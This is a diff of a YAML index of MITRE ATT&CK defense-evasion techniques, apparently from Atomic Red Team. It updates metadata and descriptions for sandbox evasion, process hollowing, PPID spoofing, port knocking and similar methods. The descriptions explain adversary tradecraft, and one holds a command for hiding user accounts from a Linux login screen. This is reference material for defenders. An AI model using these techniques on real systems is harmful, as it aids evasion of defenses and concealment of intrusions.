         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests:
     - name: office-365-Disable-AntiPhishRule
@@ -9374,7 +9466,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9409,8 +9501,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9476,7 +9566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9502,7 +9591,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9527,11 +9616,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9548,7 +9636,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9558,7 +9645,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9567,19 +9654,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9627,11 +9712,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9699,18 +9785,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9757,7 +9842,7 @@ defense-evasion:
